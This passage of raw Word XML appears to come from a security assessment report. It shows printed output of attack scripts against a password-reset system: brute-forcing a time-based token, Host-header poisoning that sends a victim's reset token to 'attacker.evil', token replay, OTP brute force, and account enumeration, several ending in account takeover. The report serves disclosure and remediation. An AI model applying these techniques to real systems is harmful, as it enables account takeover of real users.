              <w:t xml:space="preserve">    Privilege escalation with zero prior access. (CWE-915)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #5 — attack_weak_secrets.py — predictable time-based token</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>The token equals int(time.time()*1000). The attacker brackets the request time and brute-forces the few-hundred-millisecond window, never touching the victim's mailbox.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Triggered reset for victim@corp.example -&gt; HTTP 200</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    token = int(time.time()*1000) was assigned between:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">      1787579049981  and  1787579049992   (window = 12 ms)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Scanning candidate tokens 1787579049931..1787579050042 (112 guesses) against /reset-password -- no email access:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    HIT after 59 guesses: token = 1787579049989</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    server -&gt; {"account":"victim@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Login as victim with attacker's password -&gt; HTTP 200: {"is_admin":false,"status":"ok","username":"victim"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Verification - real token from outbox was: 1787579049989</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    predicted == real ? True</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[+] ATTACKER GAIN - reconstructed the reset token from time alone,</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    then took over the account. Tokens must be crypto-random. (CWE-330)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #4 — attack_host_header_injection.py — reset-link poisoning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>A forgot-password for the victim carrying Host: attacker.evil yields a reset email whose link points at the attacker's domain but carries the victim's live token.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Sending forgot-password for victim@corp.example with Host: attacker.evil</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[*] Link delivered to the victim's inbox:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    http://attacker.evil/reset-password?token=1787579043939</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    -&gt; hostname is 'attacker.evil' (attacker-controlled), NOT the real app.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    reset -&gt; HTTP 200: {"account":"victim@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    login as victim with attacker's password -&gt; HTTP 200: {"is_admin":false,"status":"ok","username":"victim"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[+] ATTACKER GAIN - the victim's genuine reset email points at the</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    attacker's domain. Clicking it leaks a live token; the attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #6 — attack_token_replay.py — no expiry / single-use</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>One token resets the password repeatedly, and an older sibling token still works after a completed reset.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    obtained token T1 = 1787579056492</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    use #1 (set 'replay_pw_A') -&gt; HTTP 200: {"account":"victim@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    use #2 SAME token (set 'replay_pw_B') -&gt; HTTP 200: {"account":"victim@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    use #3 SAME token (set 'replay_pw_C') -&gt; HTTP 200: {"account":"victim@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    issued T_old = 1787579056560</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    issued T_new = 1787579056571 (a newer request)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    complete a reset using T_new -&gt; HTTP 200</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    now reuse the OLDER T_old   -&gt; HTTP 200: {"account":"victim@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[+] ATTACKER GAIN - a reset token is a permanent, reusable key.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #7 — attack_otp_bruteforce.py — no rate limit / lockout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Part A proves no throttle exists; Part B is a real crack to takeover. The OTP happened to be low, so it fell in 26,639 attempts — the point is that nothing stopped the spray.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    sent 3000 wrong OTPs</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    status codes returned: {400: 3000}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    HTTP 429 (rate limited)? NO - never throttled</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    -&gt; no backoff: latency is flat from first to last attempt</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    measured throughput ~ 154 req/s</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    =&gt; full 10^6 keyspace is reachable; expected crack ~ 3245s (54.1 min), worst ~ 108.2 min. A lockout would cap this at N tries.</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t>[B] REAL CRACK - brute-forcing the victim's live OTP to takeover:</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    CRACKED OTP = 026638 after 26639 attempts in 169.0s (158 req/s)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    reset via cracked token -&gt; HTTP 200: {"account":"victim@corp.example","status":"password reset"}</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    login as victim -&gt; HTTP 200: {"is_admin":false,"status":"ok","username":"victim"}</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #1 — attack_enrollment_enumeration.py — enrollment enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Distinct 409s classify each candidate as existing or free.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
        <w:tblBorders>
          <w:top w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:left w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:bottom w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
          <w:right w:val="single" w:sz="4" w:space="0" w:color="D0D3D9"/>
        </w:tblBorders>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8640"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="8640"/>
            <w:shd w:val="clear" w:fill="F4F5F7"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r/>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    victim           -&gt; EXISTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    root             -&gt; EXISTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    administrator    -&gt; free (now created)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    victim@corp.example          -&gt; EXISTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    root@corp.example            -&gt; EXISTS</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    ceo@corp.example             -&gt; free (now created)</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    usernames that exist: ['victim', 'root']</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:pPr>
              <w:spacing w:after="0" w:before="0" w:line="240" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:sz w:val="16"/>
              </w:rPr>
              <w:t xml:space="preserve">    emails that exist:    ['victim@corp.example', 'root@corp.example']</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1A1A1A"/>
        </w:rPr>
        <w:t>Vulnerability #3 — attack_recovery_enumeration.py — recovery enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="0"/>
          <w:i w:val="0"/>
          <w:color w:val="1A1A1A"/>
          <w:sz w:val="20"/>
        </w:rPr>
        <w:t>Known and unknown emails return different status codes; the 200/404 split is the oracle.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="40"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i w:val="0"/>
          <w:color w:val="B01C1C"/>
          <w:sz w:val="19"/>
        </w:rPr>
        <w:t>Real output (vulnerable build):</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="auto" w:w="0"/>
        <w:jc w:val="center"/>
        <w:tblLook w:firstColumn="1" w:firstRow="1" w:lastColumn="0" w:lastRow="0" w:noHBand="0" w:noVBand="1" w:val="04A0"/>
